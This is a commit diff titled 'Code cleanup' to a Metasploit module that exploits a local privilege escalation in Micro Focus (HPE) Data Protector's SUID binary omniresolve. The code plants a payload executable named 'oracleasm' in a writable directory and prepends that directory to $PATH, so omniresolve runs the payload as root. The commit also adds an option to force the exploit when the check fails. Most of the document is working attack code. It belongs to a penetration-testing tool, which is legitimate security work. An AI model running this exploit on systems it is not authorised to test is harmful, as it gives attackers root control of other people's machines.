Code cleanup

rapid7 · Nov 1, 2019 · c6e739c · c6e739c
1 parent dc64529
commit c6e739c
Showing 1 changed file with 28 additions and 23 deletions.
diff --git a/modules/exploits/linux/local/omniresolve_suid_priv_esc.rb b/modules/exploits/linux/local/omniresolve_suid_priv_esc.rb
@@ -16,14 +16,15 @@ def initialize(info = {})
     super(update_info(info,
       'Name'           => 'Micro Focus (HPE) Data Protector SUID Privilege Escalation',
       'Description'    => %q{
-      This module exploits the trusted $PATH environment variable of the SUID binary omniresolve.
+        This module exploits the trusted `$PATH` environment variable
+        of the `omniresolve` SUID binary.
 
-      This module has been successfully tested on:
-      HPE Data Protector A.09.07: OMNIRESOLVE, internal build 110, built on Thu Aug 11 14:52:38 2016
-      Micro Focus Data Protector A.10.40: OMNIRESOLVE, internal build 118, built on Tue May 21 05:49:04 2019 on CentOS Linux release 7.6.1810 (Core)
+        This module has been successfully tested on:
+        HPE Data Protector A.09.07: OMNIRESOLVE, internal build 110, built on Thu Aug 11 14:52:38 2016;
+        Micro Focus Data Protector A.10.40: OMNIRESOLVE, internal build 118, built on Tue May 21 05:49:04 2019 on CentOS Linux release 7.6.1810 (Core)
 
-      The vulnerability has been patched in:
-      Micro Focus Data Protector A.10.40: OMNIRESOLVE, internal build 125, built on Mon Aug 19 19:22:20 2019
+        The vulnerability has been patched in:
+        Micro Focus Data Protector A.10.40: OMNIRESOLVE, internal build 125, built on Mon Aug 19 19:22:20 2019
       },
       'License'        => MSF_LICENSE,
       'Author'         =>
@@ -60,7 +61,7 @@ def initialize(info = {})
 
     register_advanced_options(
       [
-        OptBool.new('ForceExploit', [ false, 'Force exploit even if the current session is root', false ]),
+        OptBool.new('ForceExploit', [ false, 'Override check result', false ]),
         OptString.new('WritableDir', [ true, 'A directory where we can write files', '/tmp' ])
       ])
   end
@@ -75,50 +76,54 @@ def suid_bin_path
 
   def check
     unless setuid? suid_bin_path
-      print_error("#{suid_bin_path} executable is not setuid")
+      vprint_error("#{suid_bin_path} executable is not setuid")
       return CheckCode::Safe
     end
 
     info = cmd_exec("#{suid_bin_path} -ver").to_s
     if info =~ /(?<=\w\.)(\d\d\.\d\d)(.*)(?<=build )(\d\d\d)/
       version = '%.2f' % $1.to_f
       build = $3.to_i
+      vprint_status("omniresolve version #{version} build #{build}")
+
       unless Gem::Version.new(version) < target[:upper_version] ||
              (Gem::Version.new(version) == target[:upper_version] && build <= 118)
-        print_error("omniresolve version #{version} build #{build} is not vulnerable")
         return CheckCode::Safe
       end
-    else
-      print_error("Could not parse omniresolve -ver output")
-      return CheckCode::Detected
+
+      return CheckCode::Appears
     end
 
-    CheckCode::Vulnerable
+    vprint_error("Could not parse omniresolve -ver output")
+    CheckCode::Detected
   end
 
   def exploit
     if check == CheckCode::Safe
-      fail_with(Failure::NotVulnerable, "Target is not vulnerable")
+      unless datastore['ForceExploit']
+        fail_with(Failure::NotVulnerable, 'Target is not vulnerable. Set ForceExploit to override.')
+      end
+      print_warning 'Target does not appear to be vulnerable'
     end
 
     if is_root?
       unless datastore['ForceExploit']
-        fail_with(Failure::BadConfig, "Session already has root privileges. Set ForceExploit to override.")
+        fail_with(Failure::BadConfig, 'Session already has root privileges. Set ForceExploit to override.')
       end
     end
 
     unless writable?(base_dir)
       fail_with(Failure::BadConfig, "#{base_dir} is not writable")
     end
 
-    @payload_path = File.join(base_dir, "oracleasm")
-    register_file_for_cleanup(@payload_path)
-    write_file(@payload_path, generate_payload_exe)
-    chmod(@payload_path)
+    payload_path = File.join(base_dir, 'oracleasm')
+    register_file_for_cleanup(payload_path)
+    write_file(payload_path, generate_payload_exe)
+    chmod(payload_path)
 
-    @trigger_path = File.join(base_dir, Rex::Text.rand_text_alpha(10))
-    register_file_for_cleanup(@trigger_path)
-    write_file(@trigger_path, "#{rand_text_alpha(5..10)}:#{rand_text_alpha(5..10)}")
-    cmd_exec("env PATH=\"#{base_dir}:$PATH\" #{suid_bin_path} -i #{@trigger_path} &")
+    trigger_path = File.join(base_dir, Rex::Text.rand_text_alpha(10))
+    register_file_for_cleanup(trigger_path)
+    write_file(trigger_path, "#{rand_text_alpha(5..10)}:#{rand_text_alpha(5..10)}")
+    cmd_exec("env PATH=\"#{base_dir}:$PATH\" #{suid_bin_path} -i #{trigger_path} & echo ")
   end
 end